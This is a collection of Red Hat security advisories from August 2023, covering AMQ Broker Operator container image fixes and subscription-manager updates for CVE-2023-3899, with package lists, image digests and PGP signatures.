This is the multiarch release of the AMQ Broker 7.11.1 aligned Operator and associated container images on Red Hat Enterprise Linux 8 for the OpenShift Container Platform.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2023-4065: No description is available for this CVE.
* CVE-2023-4066: No description is available for this CVE.


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Quarkus

**Integration and Automation**

All Products

Issued:

2023-08-23

Updated:

2023-08-23

**RHSA-2023:4720 - Security Advisory**

*   Overview
*   Updated Images

**Synopsis**

Moderate: AMQ Broker 7.11.1.OPR.2.GA Container Images Release

**Type/Severity**

Security Advisory: Moderate

**Topic**

This is the multiarch release of the AMQ Broker 7.11.1 aligned Operator and associated container images on Red Hat Enterprise Linux 8 for the OpenShift Container Platform.  

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Red Hat Middleware for OpenShift provides images for many of the Red Hat Middleware products for use within the OpenShift Container Platform cloud computing Platform-as-a-Service (PaaS) for on-premise or private cloud deployments.  

This release of the AMQ Broker 7.11.1 aligned Operator includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.  

Security Fix(es):  

*   amq-broker-operator-container: Red Hat AMQ Broker Operator: plaintext password in operator log (CVE-2023-4065)
*   activemq-broker-operator: Red Hat AMQ Broker Operator: Passwords defined in secrets shown in StatefulSet yaml (CVE-2023-4066)

For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.  

For information on supported configurations, see Red Hat AMQ Broker 7 Supported Configurations at https://access.redhat.com/articles/2791941

**Solution**

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.  

For details on how to apply this update, refer to:  

https://access.redhat.com/articles/11258

**Affected Products**

*   Red Hat OpenShift Container Platform 4.12 for RHEL 8 x86\_64
*   Red Hat OpenShift Container Platform 4.11 for RHEL 8 x86\_64
*   Red Hat JBoss Middleware 1 x86\_64

**Fixes**

*   BZ - 2224630 - CVE-2023-4065 Red Hat AMQ Broker Operator: plaintext password in operator log
*   BZ - 2224677 - CVE-2023-4066 Red Hat AMQ Broker Operator: Passwords defined in secrets shown in StatefulSet yaml
*   ENTMQBR-7804 - Move json dumps for Openshift objects into Debug from INFO loglevel

**CVEs**

*   CVE-2020-24736
*   CVE-2023-1667
*   CVE-2023-2283
*   CVE-2023-2602
*   CVE-2023-2603
*   CVE-2023-4065
*   CVE-2023-4066
*   CVE-2023-27536
*   CVE-2023-28321
*   CVE-2023-28484
*   CVE-2023-29469
*   CVE-2023-32681
*   CVE-2023-34969

**References**

*   https://access.redhat.com/security/updates/classification/#moderate
*   https://access.redhat.com/documentation/en-us/red\_hat\_amq\_broker/

**ppc64le**

amq7/amq-broker-rhel8-operator@sha256:200dabaa7d3d7ef22353e5f70e8d7b12fe36c8e7a6c39bfa518c6187d76a9f3f

**s390x**

amq7/amq-broker-rhel8-operator@sha256:f3a205691b5d9f5623a52c756825c14bc37cb1c9e8997c915293d00ff18572a6

**x86\_64**

amq7/amq-broker-rhel8-operator@sha256:9c737dd9ea0e03d26997391b7ea08c51923fdbb3bd0852f00e58d96c78c27297

amq7/amq-broker-rhel8-operator-bundle@sha256:2da4c3e7edd27833b01c2c89e815694fc5521b1fba56a56fab4c6421d550c091

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2023:4720: Red Hat Security Advisory: AMQ Broker 7.11.1.OPR.2.GA Container Images Release

Red Hat Security Advisory 2023-4706-01 - The subscription-manager packages provide programs and libraries to allow users to manage subscriptions and yum repositories from the Red Hat entitlement platform.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: subscription-manager security update  
Advisory ID:       RHSA-2023:4706-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4706  
Issue date:        2023-08-22  
CVE Names:         CVE-2023-3899  
====================================================================  
1. Summary:

An update for subscription-manager is now available for Red Hat Enterprise  
Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The subscription-manager packages provide programs and libraries to allow  
users to manage subscriptions and yum repositories from the Red Hat  
entitlement platform.

Security Fix(es):

* subscription-manager: inadequate authorization of com.redhat.RHSM1 D-Bus  
interface allows local users to modify configuration (CVE-2023-3899)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2225407 - CVE-2023-3899 subscription-manager: inadequate authorization of com.redhat.RHSM1 D-Bus interface allows local users to modify configuration

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

aarch64:  
dnf-plugin-subscription-manager-debuginfo-1.28.36-3.el8_8.aarch64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.36-3.el8_8.aarch64.rpm  
rhsm-gtk-1.28.36-3.el8_8.aarch64.rpm  
subscription-manager-debuginfo-1.28.36-3.el8_8.aarch64.rpm  
subscription-manager-debugsource-1.28.36-3.el8_8.aarch64.rpm  
subscription-manager-initial-setup-addon-1.28.36-3.el8_8.aarch64.rpm  
subscription-manager-migration-1.28.36-3.el8_8.aarch64.rpm

ppc64le:  
dnf-plugin-subscription-manager-debuginfo-1.28.36-3.el8_8.ppc64le.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.36-3.el8_8.ppc64le.rpm  
rhsm-gtk-1.28.36-3.el8_8.ppc64le.rpm  
subscription-manager-debuginfo-1.28.36-3.el8_8.ppc64le.rpm  
subscription-manager-debugsource-1.28.36-3.el8_8.ppc64le.rpm  
subscription-manager-initial-setup-addon-1.28.36-3.el8_8.ppc64le.rpm  
subscription-manager-migration-1.28.36-3.el8_8.ppc64le.rpm

s390x:  
dnf-plugin-subscription-manager-debuginfo-1.28.36-3.el8_8.s390x.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.36-3.el8_8.s390x.rpm  
rhsm-gtk-1.28.36-3.el8_8.s390x.rpm  
subscription-manager-debuginfo-1.28.36-3.el8_8.s390x.rpm  
subscription-manager-debugsource-1.28.36-3.el8_8.s390x.rpm  
subscription-manager-initial-setup-addon-1.28.36-3.el8_8.s390x.rpm  
subscription-manager-migration-1.28.36-3.el8_8.s390x.rpm

x86_64:  
dnf-plugin-subscription-manager-debuginfo-1.28.36-3.el8_8.x86_64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.36-3.el8_8.x86_64.rpm  
rhsm-gtk-1.28.36-3.el8_8.x86_64.rpm  
subscription-manager-debuginfo-1.28.36-3.el8_8.x86_64.rpm  
subscription-manager-debugsource-1.28.36-3.el8_8.x86_64.rpm  
subscription-manager-initial-setup-addon-1.28.36-3.el8_8.x86_64.rpm  
subscription-manager-migration-1.28.36-3.el8_8.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
subscription-manager-1.28.36-3.el8_8.src.rpm

aarch64:  
dnf-plugin-subscription-manager-1.28.36-3.el8_8.aarch64.rpm  
dnf-plugin-subscription-manager-debuginfo-1.28.36-3.el8_8.aarch64.rpm  
python3-cloud-what-1.28.36-3.el8_8.aarch64.rpm  
python3-subscription-manager-rhsm-1.28.36-3.el8_8.aarch64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.36-3.el8_8.aarch64.rpm  
python3-syspurpose-1.28.36-3.el8_8.aarch64.rpm  
subscription-manager-1.28.36-3.el8_8.aarch64.rpm  
subscription-manager-debuginfo-1.28.36-3.el8_8.aarch64.rpm  
subscription-manager-debugsource-1.28.36-3.el8_8.aarch64.rpm  
subscription-manager-plugin-ostree-1.28.36-3.el8_8.aarch64.rpm  
subscription-manager-rhsm-certificates-1.28.36-3.el8_8.aarch64.rpm

noarch:  
rhsm-icons-1.28.36-3.el8_8.noarch.rpm  
subscription-manager-cockpit-1.28.36-3.el8_8.noarch.rpm

ppc64le:  
dnf-plugin-subscription-manager-1.28.36-3.el8_8.ppc64le.rpm  
dnf-plugin-subscription-manager-debuginfo-1.28.36-3.el8_8.ppc64le.rpm  
python3-cloud-what-1.28.36-3.el8_8.ppc64le.rpm  
python3-subscription-manager-rhsm-1.28.36-3.el8_8.ppc64le.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.36-3.el8_8.ppc64le.rpm  
python3-syspurpose-1.28.36-3.el8_8.ppc64le.rpm  
subscription-manager-1.28.36-3.el8_8.ppc64le.rpm  
subscription-manager-debuginfo-1.28.36-3.el8_8.ppc64le.rpm  
subscription-manager-debugsource-1.28.36-3.el8_8.ppc64le.rpm  
subscription-manager-plugin-ostree-1.28.36-3.el8_8.ppc64le.rpm  
subscription-manager-rhsm-certificates-1.28.36-3.el8_8.ppc64le.rpm

s390x:  
dnf-plugin-subscription-manager-1.28.36-3.el8_8.s390x.rpm  
dnf-plugin-subscription-manager-debuginfo-1.28.36-3.el8_8.s390x.rpm  
python3-cloud-what-1.28.36-3.el8_8.s390x.rpm  
python3-subscription-manager-rhsm-1.28.36-3.el8_8.s390x.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.36-3.el8_8.s390x.rpm  
python3-syspurpose-1.28.36-3.el8_8.s390x.rpm  
subscription-manager-1.28.36-3.el8_8.s390x.rpm  
subscription-manager-debuginfo-1.28.36-3.el8_8.s390x.rpm  
subscription-manager-debugsource-1.28.36-3.el8_8.s390x.rpm  
subscription-manager-plugin-ostree-1.28.36-3.el8_8.s390x.rpm  
subscription-manager-rhsm-certificates-1.28.36-3.el8_8.s390x.rpm

x86_64:  
dnf-plugin-subscription-manager-1.28.36-3.el8_8.x86_64.rpm  
dnf-plugin-subscription-manager-debuginfo-1.28.36-3.el8_8.x86_64.rpm  
python3-cloud-what-1.28.36-3.el8_8.x86_64.rpm  
python3-subscription-manager-rhsm-1.28.36-3.el8_8.x86_64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.36-3.el8_8.x86_64.rpm  
python3-syspurpose-1.28.36-3.el8_8.x86_64.rpm  
subscription-manager-1.28.36-3.el8_8.x86_64.rpm  
subscription-manager-debuginfo-1.28.36-3.el8_8.x86_64.rpm  
subscription-manager-debugsource-1.28.36-3.el8_8.x86_64.rpm  
subscription-manager-plugin-ostree-1.28.36-3.el8_8.x86_64.rpm  
subscription-manager-rhsm-certificates-1.28.36-3.el8_8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-3899  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk5RhpAAoJENzjgjWX9erERQEP/Ru/BPo3Y/bFAfm1oid/H4Ub  
xOhSXABuI/PWfgGbGyvkZFEs2ZGgu2ec0KcGhlI0ztd+GOKat/Dqc4ryoSbTiPdu  
+VEVFtFUEGPV5alhvWuplpLpkg3fCSNviu8479JhxfndAcGzm1VPv2ahHjDMJFWc  
bDkbW8knSJJo3ZMySjZHg1TPA+heDS/ytRBZYzUGxSQnvYW0BFRjDbdM6aXD4wNH  
gPzNdQUKvvmx0J/0+1ex8tHgr2pkt+6+YE6onG00f+E3bDHfMfZG8vJ3XLUtna3r  
SQNRyxft+3HFb0MdxMBye01W0fjMTWqpEa5Rb0dQ3YOQoPW872w7nHWXU3xZGEQV  
yS5qGpJic3WAHNwvukAoNH5ryXD4cn9eW80bFx5938abrhfAPi2D/PWPz2rwZXpq  
vJ+lKXiupKj1ADt9v7EW8R4/ES96VWJctB0jGMmu/mjOQdTDNrYXdEvmJB4fplHI  
gz5EIKS/8Rq0+J87sDWrti9TLe7+j/oep9Ory6oHQTVet7iE8NAFrcX9Nj/qy5oU  
Su3iPcqESrxab67+aE9WV/EQjfzzyhAc7L8W9s1KyLDdje9zLABNP4MRGznMWsV3  
dWVo2rOjVS8avTGYTyq9ozEGlt8Il+ZDQq/GiO+NXkVbiAWyCneVXdbJGjtEbVwr  
xctzv2rMyvs8lEqXZPpP  
=s73g  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4706-01

Red Hat Security Advisory 2023-4705-01 - The subscription-manager packages provide programs and libraries to allow users to manage subscriptions and yum repositories from the Red Hat entitlement platform.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: subscription-manager security update  
Advisory ID:       RHSA-2023:4705-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4705  
Issue date:        2023-08-22  
CVE Names:         CVE-2023-3899  
====================================================================  
1. Summary:

An update for subscription-manager is now available for Red Hat Enterprise  
Linux 8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS EUS (v.8.6) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The subscription-manager packages provide programs and libraries to allow  
users to manage subscriptions and yum repositories from the Red Hat  
entitlement platform.

Security Fix(es):

* subscription-manager: inadequate authorization of com.redhat.RHSM1 D-Bus  
interface allows local users to modify configuration (CVE-2023-3899)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2225407 - CVE-2023-3899 subscription-manager: inadequate authorization of com.redhat.RHSM1 D-Bus interface allows local users to modify configuration

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

aarch64:  
dnf-plugin-subscription-manager-debuginfo-1.28.29.1-2.el8_6.aarch64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.29.1-2.el8_6.aarch64.rpm  
rhsm-gtk-1.28.29.1-2.el8_6.aarch64.rpm  
subscription-manager-debuginfo-1.28.29.1-2.el8_6.aarch64.rpm  
subscription-manager-debugsource-1.28.29.1-2.el8_6.aarch64.rpm  
subscription-manager-initial-setup-addon-1.28.29.1-2.el8_6.aarch64.rpm  
subscription-manager-migration-1.28.29.1-2.el8_6.aarch64.rpm

ppc64le:  
dnf-plugin-subscription-manager-debuginfo-1.28.29.1-2.el8_6.ppc64le.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.29.1-2.el8_6.ppc64le.rpm  
rhsm-gtk-1.28.29.1-2.el8_6.ppc64le.rpm  
subscription-manager-debuginfo-1.28.29.1-2.el8_6.ppc64le.rpm  
subscription-manager-debugsource-1.28.29.1-2.el8_6.ppc64le.rpm  
subscription-manager-initial-setup-addon-1.28.29.1-2.el8_6.ppc64le.rpm  
subscription-manager-migration-1.28.29.1-2.el8_6.ppc64le.rpm

s390x:  
dnf-plugin-subscription-manager-debuginfo-1.28.29.1-2.el8_6.s390x.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.29.1-2.el8_6.s390x.rpm  
rhsm-gtk-1.28.29.1-2.el8_6.s390x.rpm  
subscription-manager-debuginfo-1.28.29.1-2.el8_6.s390x.rpm  
subscription-manager-debugsource-1.28.29.1-2.el8_6.s390x.rpm  
subscription-manager-initial-setup-addon-1.28.29.1-2.el8_6.s390x.rpm  
subscription-manager-migration-1.28.29.1-2.el8_6.s390x.rpm

x86_64:  
dnf-plugin-subscription-manager-debuginfo-1.28.29.1-2.el8_6.x86_64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.29.1-2.el8_6.x86_64.rpm  
rhsm-gtk-1.28.29.1-2.el8_6.x86_64.rpm  
subscription-manager-debuginfo-1.28.29.1-2.el8_6.x86_64.rpm  
subscription-manager-debugsource-1.28.29.1-2.el8_6.x86_64.rpm  
subscription-manager-initial-setup-addon-1.28.29.1-2.el8_6.x86_64.rpm  
subscription-manager-migration-1.28.29.1-2.el8_6.x86_64.rpm

Red Hat Enterprise Linux BaseOS EUS (v.8.6):

Source:  
subscription-manager-1.28.29.1-2.el8_6.src.rpm

aarch64:  
dnf-plugin-subscription-manager-1.28.29.1-2.el8_6.aarch64.rpm  
dnf-plugin-subscription-manager-debuginfo-1.28.29.1-2.el8_6.aarch64.rpm  
python3-cloud-what-1.28.29.1-2.el8_6.aarch64.rpm  
python3-subscription-manager-rhsm-1.28.29.1-2.el8_6.aarch64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.29.1-2.el8_6.aarch64.rpm  
python3-syspurpose-1.28.29.1-2.el8_6.aarch64.rpm  
subscription-manager-1.28.29.1-2.el8_6.aarch64.rpm  
subscription-manager-debuginfo-1.28.29.1-2.el8_6.aarch64.rpm  
subscription-manager-debugsource-1.28.29.1-2.el8_6.aarch64.rpm  
subscription-manager-plugin-ostree-1.28.29.1-2.el8_6.aarch64.rpm  
subscription-manager-rhsm-certificates-1.28.29.1-2.el8_6.aarch64.rpm

noarch:  
rhsm-icons-1.28.29.1-2.el8_6.noarch.rpm  
subscription-manager-cockpit-1.28.29.1-2.el8_6.noarch.rpm

ppc64le:  
dnf-plugin-subscription-manager-1.28.29.1-2.el8_6.ppc64le.rpm  
dnf-plugin-subscription-manager-debuginfo-1.28.29.1-2.el8_6.ppc64le.rpm  
python3-cloud-what-1.28.29.1-2.el8_6.ppc64le.rpm  
python3-subscription-manager-rhsm-1.28.29.1-2.el8_6.ppc64le.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.29.1-2.el8_6.ppc64le.rpm  
python3-syspurpose-1.28.29.1-2.el8_6.ppc64le.rpm  
subscription-manager-1.28.29.1-2.el8_6.ppc64le.rpm  
subscription-manager-debuginfo-1.28.29.1-2.el8_6.ppc64le.rpm  
subscription-manager-debugsource-1.28.29.1-2.el8_6.ppc64le.rpm  
subscription-manager-plugin-ostree-1.28.29.1-2.el8_6.ppc64le.rpm  
subscription-manager-rhsm-certificates-1.28.29.1-2.el8_6.ppc64le.rpm

s390x:  
dnf-plugin-subscription-manager-1.28.29.1-2.el8_6.s390x.rpm  
dnf-plugin-subscription-manager-debuginfo-1.28.29.1-2.el8_6.s390x.rpm  
python3-cloud-what-1.28.29.1-2.el8_6.s390x.rpm  
python3-subscription-manager-rhsm-1.28.29.1-2.el8_6.s390x.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.29.1-2.el8_6.s390x.rpm  
python3-syspurpose-1.28.29.1-2.el8_6.s390x.rpm  
subscription-manager-1.28.29.1-2.el8_6.s390x.rpm  
subscription-manager-debuginfo-1.28.29.1-2.el8_6.s390x.rpm  
subscription-manager-debugsource-1.28.29.1-2.el8_6.s390x.rpm  
subscription-manager-plugin-ostree-1.28.29.1-2.el8_6.s390x.rpm  
subscription-manager-rhsm-certificates-1.28.29.1-2.el8_6.s390x.rpm

x86_64:  
dnf-plugin-subscription-manager-1.28.29.1-2.el8_6.x86_64.rpm  
dnf-plugin-subscription-manager-debuginfo-1.28.29.1-2.el8_6.x86_64.rpm  
python3-cloud-what-1.28.29.1-2.el8_6.x86_64.rpm  
python3-subscription-manager-rhsm-1.28.29.1-2.el8_6.x86_64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.28.29.1-2.el8_6.x86_64.rpm  
python3-syspurpose-1.28.29.1-2.el8_6.x86_64.rpm  
subscription-manager-1.28.29.1-2.el8_6.x86_64.rpm  
subscription-manager-debuginfo-1.28.29.1-2.el8_6.x86_64.rpm  
subscription-manager-debugsource-1.28.29.1-2.el8_6.x86_64.rpm  
subscription-manager-plugin-ostree-1.28.29.1-2.el8_6.x86_64.rpm  
subscription-manager-rhsm-certificates-1.28.29.1-2.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-3899  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk5RiOAAoJENzjgjWX9erEmxUP/0z0noSNUesKNazTC8IcDvMw  
lXrsrV7Fub1Eu2hY2SksJAKd67KyAX6rnP2U8X4ztnFuS23m3uyXqR2UJl4oH9Yn  
G1jZuafIxooPvFJiAaEndFIvT1ymguPKSloEM0r6COuyQTAI3GefR4/Uy31mqaJv  
T8Qh1Q/UH8iJfPDZv28n225kMK3dKoIY3+GnyHTBu3Y298azF1GGOlX1+FCng9Io  
LZYZsA1LFIKnW1kL3/x7vA7JfAkOx4pMUkuP/rL+99kP7bconYehOI9qZlnis5Lm  
ssF/TeUJtYQ6XHC14KmVZ/Fo2Igg61tCUFc/EqbYIVbJGr9i7+PlAxx0isXDO7ah  
iRCobRL64OKFK7h+sFQHJcYPq/DjnAUuMfmN1jn0sDZv5T+RG0cWpveA7DFeQMW7  
kj/ONVYJNVl7w7c44J7sg5vo0R+VhmzdiRVzugjJkriACP1GbpOXXyWzLsofIkSq  
mhCnHtWz0btZQvi+o9YCbMSleJswQi4DNqI8dVH53hcQ3eSPwSOfVmSyyFIViS3+  
rc20evqfNSO2LGWEF9d8yRdc7EQ5YdmlzCwWWnBeaSTo89bODlPCb4vXZOGei+I7  
nue9Wvd5Il9PLBDRXVhIZiTQqWvjFUh2w8/4GQp1yvNL2hVrCXpc5npk47SwRcuF  
dLJdGfv2WOSnkrZuuOWv  
=9V3c  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4705-01

Red Hat Security Advisory 2023-4702-01 - The subscription-manager packages provide programs and libraries to allow users to manage subscriptions and yum repositories from the Red Hat entitlement platform.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: subscription-manager security update  
Advisory ID:       RHSA-2023:4702-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4702  
Issue date:        2023-08-22  
CVE Names:         CVE-2023-3899  
====================================================================  
1. Summary:

An update for subscription-manager is now available for Red Hat Enterprise  
Linux 8.1 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS E4S (v. 8.1) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The subscription-manager packages provide programs and libraries to allow  
users to manage subscriptions and yum repositories from the Red Hat  
entitlement platform.

Security Fix(es):

* subscription-manager: inadequate authorization of com.redhat.RHSM1 D-Bus  
interface allows local users to modify configuration (CVE-2023-3899)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2225407 - CVE-2023-3899 subscription-manager: inadequate authorization of com.redhat.RHSM1 D-Bus interface allows local users to modify configuration

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

aarch64:  
dnf-plugin-subscription-manager-debuginfo-1.25.17.1-2.el8_1.aarch64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.25.17.1-2.el8_1.aarch64.rpm  
rhsm-gtk-1.25.17.1-2.el8_1.aarch64.rpm  
subscription-manager-debuginfo-1.25.17.1-2.el8_1.aarch64.rpm  
subscription-manager-debugsource-1.25.17.1-2.el8_1.aarch64.rpm  
subscription-manager-initial-setup-addon-1.25.17.1-2.el8_1.aarch64.rpm  
subscription-manager-migration-1.25.17.1-2.el8_1.aarch64.rpm

ppc64le:  
dnf-plugin-subscription-manager-debuginfo-1.25.17.1-2.el8_1.ppc64le.rpm  
python3-subscription-manager-rhsm-debuginfo-1.25.17.1-2.el8_1.ppc64le.rpm  
rhsm-gtk-1.25.17.1-2.el8_1.ppc64le.rpm  
subscription-manager-debuginfo-1.25.17.1-2.el8_1.ppc64le.rpm  
subscription-manager-debugsource-1.25.17.1-2.el8_1.ppc64le.rpm  
subscription-manager-initial-setup-addon-1.25.17.1-2.el8_1.ppc64le.rpm  
subscription-manager-migration-1.25.17.1-2.el8_1.ppc64le.rpm

s390x:  
dnf-plugin-subscription-manager-debuginfo-1.25.17.1-2.el8_1.s390x.rpm  
python3-subscription-manager-rhsm-debuginfo-1.25.17.1-2.el8_1.s390x.rpm  
rhsm-gtk-1.25.17.1-2.el8_1.s390x.rpm  
subscription-manager-debuginfo-1.25.17.1-2.el8_1.s390x.rpm  
subscription-manager-debugsource-1.25.17.1-2.el8_1.s390x.rpm  
subscription-manager-initial-setup-addon-1.25.17.1-2.el8_1.s390x.rpm  
subscription-manager-migration-1.25.17.1-2.el8_1.s390x.rpm

x86_64:  
dnf-plugin-subscription-manager-debuginfo-1.25.17.1-2.el8_1.x86_64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.25.17.1-2.el8_1.x86_64.rpm  
rhsm-gtk-1.25.17.1-2.el8_1.x86_64.rpm  
subscription-manager-debuginfo-1.25.17.1-2.el8_1.x86_64.rpm  
subscription-manager-debugsource-1.25.17.1-2.el8_1.x86_64.rpm  
subscription-manager-initial-setup-addon-1.25.17.1-2.el8_1.x86_64.rpm  
subscription-manager-migration-1.25.17.1-2.el8_1.x86_64.rpm

Red Hat Enterprise Linux BaseOS E4S (v. 8.1):

Source:  
subscription-manager-1.25.17.1-2.el8_1.src.rpm

aarch64:  
dnf-plugin-subscription-manager-1.25.17.1-2.el8_1.aarch64.rpm  
dnf-plugin-subscription-manager-debuginfo-1.25.17.1-2.el8_1.aarch64.rpm  
python3-subscription-manager-rhsm-1.25.17.1-2.el8_1.aarch64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.25.17.1-2.el8_1.aarch64.rpm  
python3-syspurpose-1.25.17.1-2.el8_1.aarch64.rpm  
subscription-manager-1.25.17.1-2.el8_1.aarch64.rpm  
subscription-manager-debuginfo-1.25.17.1-2.el8_1.aarch64.rpm  
subscription-manager-debugsource-1.25.17.1-2.el8_1.aarch64.rpm  
subscription-manager-plugin-container-1.25.17.1-2.el8_1.aarch64.rpm  
subscription-manager-plugin-ostree-1.25.17.1-2.el8_1.aarch64.rpm  
subscription-manager-rhsm-certificates-1.25.17.1-2.el8_1.aarch64.rpm

noarch:  
subscription-manager-cockpit-1.25.17.1-2.el8_1.noarch.rpm

ppc64le:  
dnf-plugin-subscription-manager-1.25.17.1-2.el8_1.ppc64le.rpm  
dnf-plugin-subscription-manager-debuginfo-1.25.17.1-2.el8_1.ppc64le.rpm  
python3-subscription-manager-rhsm-1.25.17.1-2.el8_1.ppc64le.rpm  
python3-subscription-manager-rhsm-debuginfo-1.25.17.1-2.el8_1.ppc64le.rpm  
python3-syspurpose-1.25.17.1-2.el8_1.ppc64le.rpm  
subscription-manager-1.25.17.1-2.el8_1.ppc64le.rpm  
subscription-manager-debuginfo-1.25.17.1-2.el8_1.ppc64le.rpm  
subscription-manager-debugsource-1.25.17.1-2.el8_1.ppc64le.rpm  
subscription-manager-plugin-container-1.25.17.1-2.el8_1.ppc64le.rpm  
